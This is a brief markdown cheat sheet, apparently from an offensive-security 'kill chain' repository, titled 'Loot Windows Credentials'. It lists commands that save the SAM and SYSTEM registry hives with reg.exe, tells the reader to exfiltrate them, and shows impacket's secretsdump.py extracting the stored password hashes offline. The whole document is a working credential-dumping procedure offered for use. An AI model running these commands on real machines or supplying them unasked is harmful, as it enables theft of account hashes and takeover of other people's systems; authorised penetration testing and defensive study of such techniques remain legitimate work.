killchain-compendium/Exfiltration/Windows/loot.md

15 lines
219 B
Markdown
Raw Normal View History

2021-08-23 01:13:54 +02:00
# Loot Windows Credentials
```sh
reg.exe save HKLM\SAM sam.bak
```
```sh
reg.exe save HKLM\SYSTEM system.bak
```
* Exifiltrate and use impacket
```sh
examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
```